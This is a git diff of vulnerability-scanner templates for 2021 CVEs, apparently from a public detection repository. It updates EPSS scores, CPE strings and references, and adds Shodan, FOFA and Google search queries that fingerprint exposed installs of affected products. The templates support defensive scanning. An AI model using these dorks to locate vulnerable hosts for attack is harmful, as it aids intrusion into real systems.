epss-score: 0.00099 + epss-percentile: 0.41025 cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 8c81b5b939..53a4722127 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-30151 cwe-id: CWE-79 - epss-score: 0.00574 - epss-percentile: 0.77475 + epss-score: 0.00812 + epss-percentile: 0.81748 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: contribsys product: sidekiq shodan-query: title:"Sidekiq" + fofa-query: title="sidekiq" + google-query: intitle:"sidekiq" tags: cve2021,cve,xss,sidekiq,authenticated,contribsys http: diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index ec903a4255..fdd9c980ba 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -19,13 +19,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3017 - epss-score: 0.01527 - epss-percentile: 0.86768 - cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:* + epss-score: 0.01563 + epss-percentile: 0.87211 + cpe: cpe:2.3:h:intelbras:win_300:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras - product: win_300_firmware + product: win_300 tags: cve2021,cve,exposure,router,intelbras http: diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 245a4f438a..e6ee2c214a 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -20,13 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2021-30175 cwe-id: CWE-89 - epss-score: 0.05126 - epss-percentile: 0.92775 + epss-score: 0.06252 + epss-percentile: 0.93587 cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zerof product: web_server + shodan-query: cpe:"cpe:2.3:a:google:web_server" tags: cve2021,cve,zerof,sqli http: diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index 81cd4fd3aa..be2feaac93 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-3019 cwe-id: CWE-22 - epss-score: 0.00832 - epss-percentile: 0.81646 + epss-score: 0.01119 + epss-percentile: 0.84553 cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index c7db2df945..d3bee5e1a9 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-30213 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42145 + epss-percentile: 0.43249 cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 19911e5244..4c0742aa5f 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -14,19 +14,23 @@ info: - https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ - https://nvd.nist.gov/vuln/detail/CVE-2021-30461 - https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce + - https://github.com/ARPSyndicate/cvemon + - https://github.com/openx-org/BLEN classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-30461 cwe-id: CWE-94 - epss-score: 0.96262 - epss-percentile: 0.99416 + epss-score: 0.95518 + epss-percentile: 0.99386 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: voipmonitor product: voipmonitor shodan-query: http.title:"VoIPmonitor" + fofa-query: title="voipmonitor" + google-query: intitle:"voipmonitor" tags: cve2021,cve,rce,voipmonitor http: diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 5694461ec9..629ef8ce82 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-30497 cwe-id: CWE-22 - epss-score: 0.95284 - epss-percentile: 0.99297 + epss-score: 0.95082 + epss-percentile: 0.99313 cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index ca1e66df46..50ed6d0a55 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -22,13 +22,14 @@ info: cve-id: CVE-2021-3110 cwe-id: CWE-89 epss-score: 0.83896 - epss-percentile: 0.98387 + epss-percentile: 0.98474 cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: prestashop product: prestashop + shodan-query: cpe:"cpe:2.3:a:prestashop:prestashop" tags: cve,cve2021,sqli,prestshop,edb,prestashop http: diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index 6c895b086f..6e19ed1bad 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -28,6 +28,8 @@ info: vendor: microsoft product: exchange_server shodan-query: http.title:"Outlook" + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve2021,cve,microsoft,exchange,owa,xss http: diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index d41300c112..601045c4e4 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2021-31250 cwe-id: CWE-79 - epss-score: 0.97079 - epss-percentile: 0.99728 + epss-score: 0.97029 + epss-percentile: 0.9975 cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index d124b4b33a..e4529cfda9 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-31537 cwe-id: CWE-79 epss-score: 0.00355 - epss-percentile: 0.71454 + epss-percentile: 0.71969 cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 8deb6bf7e7..381f4d02f1 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -12,13 +12,15 @@ info: - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/ - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ - https://nvd.nist.gov/vuln/detail/CVE-2021-31581 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.4 cve-id: CVE-2021-31581 - cwe-id: CWE-312,CWE-269 - epss-score: 0.00285 - epss-percentile: 0.65373 + cwe-id: CWE-269,CWE-312 + epss-score: 0.00213 + epss-percentile: 0.59248 cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index 1e4a75e5bd..a406109b52 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-31589 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.65537 + epss-percentile: 0.68716 cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index e17f57dc74..ae92682338 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-31602 cwe-id: CWE-287 - epss-score: 0.36115 - epss-percentile: 0.97042 + epss-score: 0.25923 + epss-percentile: 0.9671 cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 29bc75f70b..571c3ad736 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -20,14 +20,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-31682 cwe-id: CWE-79 - epss-score: 0.01492 - epss-percentile: 0.86569 + epss-score: 0.0116 + epss-percentile: 0.84847 cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: automatedlogic product: webctrl shodan-query: html:"/_common/lvl5/dologin.jsp" + fofa-query: body="/_common/lvl5/dologin.jsp" tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic http: diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index 0ead178809..e14aefe39e 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-31755 cwe-id: CWE-787 - epss-score: 0.96978 - epss-percentile: 0.99717 + epss-score: 0.97104 + epss-percentile: 0.99781 cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 30f2975f4c..f1ee5ac188 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2021,cve,apache,rce,struts,struts2,intrusive http: diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index 805fc25458..c45ee5267b 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: sysaid product: sysaid + shodan-query: http.favicon.hash:1540720428 + fofa-query: icon_hash=1540720428 tags: cve2021,cve,xss,sysaid http: diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 15ec1ab636..35519a7591 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -31,6 +31,7 @@ info: framework: node.js shodan-query: title:"Node-RED" fofa-query: title="Node-RED" + google-query: intitle:"node-red" tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js http: diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index aad17cfa4e..804f0a137b 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-32618 cwe-id: CWE-601 epss-score: 0.00113 - epss-percentile: 0.43765 + epss-percentile: 0.44665 cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 14579e4856..34558cc2fc 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.6 cve-id: CVE-2021-32820 cwe-id: CWE-94,CWE-200 - epss-score: 0.01304 - epss-percentile: 0.85598 + epss-score: 0.01756 + epss-percentile: 0.8795 cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 5c5fd48f84..b74c2d40bb 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -27,6 +27,8 @@ info: vendor: erxes product: erxes shodan-query: http.title:"erxes" + fofa-query: title="erxes" + google-query: intitle:"erxes" tags: cve2021,cve,xss,erxes,oss http: diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index 6c6d012ae4..d546ad9d09 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.8 cve-id: CVE-2021-3297 cwe-id: CWE-287 - epss-score: 0.1939 - epss-percentile: 0.96173 + epss-score: 0.26301 + epss-percentile: 0.96731 cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 169ea1437a..9ec63b51e9 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 - https://www.dahuasecurity.com/support/cybersecurity/details/957 + - https://github.com/bp2008/DahuaLoginBypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33044 cwe-id: CWE-287 - epss-score: 0.29051 - epss-percentile: 0.96446 + epss-score: 0.30359 + epss-percentile: 0.96948 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index d4f23cae61..788be4ab37 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33221 cwe-id: CWE-306 - epss-score: 0.23566 - epss-percentile: 0.96154 + epss-score: 0.20879 + epss-percentile: 0.96393 cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index 504f99f93b..e0d84db1c9 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -21,13 +21,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33357 cwe-id: CWE-78 - epss-score: 0.96502 - epss-percentile: 0.99569 + epss-score: 0.96707 + epss-percentile: 0.99648 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: raspap product: raspap + shodan-query: http.favicon.hash:-1465760059 + fofa-query: icon_hash=-1465760059 tags: cve2021,cve,rce,raspap,oast http: diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index ab06b3d302..a1e772d026 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -27,6 +27,7 @@ info: vendor: sap product: netweaver_development_infrastructure shodan-query: html:"SAP NetWeaver" + fofa-query: body="sap netweaver" tags: cve2021,cve,oast,ssrf,sap http: diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 0aac62c649..3180a8af63 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -13,13 +13,15 @@ info: - https://github.com/colemanjp/shinyserver-directory-traversal-source-code-leak - https://blog.rstudio.com/2021/01/13/shiny-server-1-5-16-update/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3374 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-3374 cwe-id: CWE-22 epss-score: 0.00235 - epss-percentile: 0.61534 + epss-percentile: 0.61494 cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index e4d7af1171..75ef34cecf 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-3377 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46774 + epss-percentile: 0.47703 cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 26f2117ef5..1254618934 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-33807 cwe-id: CWE-22 - epss-score: 0.02187 - epss-percentile: 0.89167 + epss-score: 0.02481 + epss-percentile: 0.9007 cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index eae0b6e411..d52387d771 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-33851 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.2831 + epss-percentile: 0.29862 cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index 07c7216ed5..e3e8e65858 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-33904 cwe-id: CWE-79 epss-score: 0.00182 - epss-percentile: 0.54617 + epss-percentile: 0.55425 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index 549950afe5..ee42609eb1 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -28,6 +28,7 @@ info: max-request: 2 vendor: eclipse product: jetty + shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" tags: cve2021,cve,jetty,eclipse http: diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index a90d67b335..9cdf5d3cbc 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: microsoft product: exchange_server + shodan-query: vuln:cve-2021-26855 + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft http: diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 7dd6ecef37..579b5f4fe4 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -14,13 +14,14 @@ info: - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640 - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628 - https://nvd.nist.gov/vuln/detail/CVE-2021-34640 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-34640 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.45185 + epss-score: 0.00123 + epss-percentile: 0.46682 cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 8dfd2c16cb..edb34639c5 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-34643 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.44405 + epss-score: 0.00123 + epss-percentile: 0.46682 cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index ab9cf50e5d..7d19335562 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-34805 cwe-id: CWE-22 epss-score: 0.17035 - epss-percentile: 0.95944 + epss-percentile: 0.96066 cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 2f70ac4c8c..824eabf5ff 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-35250 cwe-id: CWE-22 epss-score: 0.05835 - epss-percentile: 0.93245 + epss-percentile: 0.93393 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 8c4716f1d2..9f273821c2 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -21,14 +21,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-35265 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47461 + epss-score: 0.00141 + epss-percentile: 0.4979 cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: maxsite product: maxsite_cms shodan-query: html:'content="MaxSite CMS' + fofa-query: body='content="maxsite cms' tags: cve2021,cve,maxsite,xss http: diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 3ee693b34b..a3a2c59b8f 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -19,13 +19,13 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35336 cwe-id: CWE-1188 - epss-score: 0.0793 - epss-percentile: 0.94105 - cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:* + epss-score: 0.13449 + epss-percentile: 0.95592 + cpe: cpe:2.3:h:tieline:ip_audtio_gateway:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tieline - product: ip_audtio_gateway_firmware + product: ip_audtio_gateway tags: cve2021,cve,tieline,default-login http: diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index b585dcd25f..ec4e437cda 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -12,12 +12,13 @@ info: - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities - https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en - https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf + - https://github.com/Knighthana/YABWF classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-35395 - epss-score: 0.97119 - epss-percentile: 0.99744 + epss-score: 0.96911 + epss-percentile: 0.99713 cpe: cpe:2.3:a:realtek:realtek_jungle_sdk:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index a610fcbce1..55637663fe 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -24,14 +24,16 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35464 cwe-id: CWE-502 - epss-score: 0.97262 - epss-percentile: 0.99826 + epss-score: 0.97398 + epss-percentile: 0.99918 cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: forgerock product: am shodan-query: http.title:"OpenAM" + fofa-query: title="openam" + google-query: intitle:"openam" tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock http: diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index bb60f03561..f674842e2d 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-35488 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.49429 + epss-percentile: 0.50266 cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: thruk product: thruk shodan-query: http.html:"Thruk" + fofa-query: body="thruk" tags: cve2021,cve,thruk,xss http: diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 88fe555cd4..0f839ba7da 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -31,6 +31,7 @@ info: product: access_manager shodan-query: http.title:"Oracle Access Management" fofa-query: body="/oam/pages/css/login_page.css" + google-query: intitle:"oracle access management" tags: cve2021,cve,oam,rce,java,unauth,oracle,kev http: diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index c46469508c..765fb91c1e 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -13,13 +13,15 @@ info: - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577 - https://binatoneglobal.com/security-advisory/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-3577 cwe-id: CWE-863,CWE-78 - epss-score: 0.96689 - epss-percentile: 0.99568 + epss-score: 0.95748 + epss-percentile: 0.99426 cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index abbbf9a55e..b69a735ba2 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -28,8 +28,8 @@ info: vendor: hikvision product: ds-2cd2026g2-iu\/sl_firmware shodan-query: http.favicon.hash:999357577 + fofa-query: icon_hash=999357577 tags: cve2021,cve,hikvision,rce,iot,intrusive,kev - variables: string: "{{to_lower(rand_base(12))}}" diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 8dbb5f01fd..2fe2767c5d 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - epss-score: 0.90558 - epss-percentile: 0.98752 + epss-score: 0.88569 + epss-percentile: 0.98691 cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 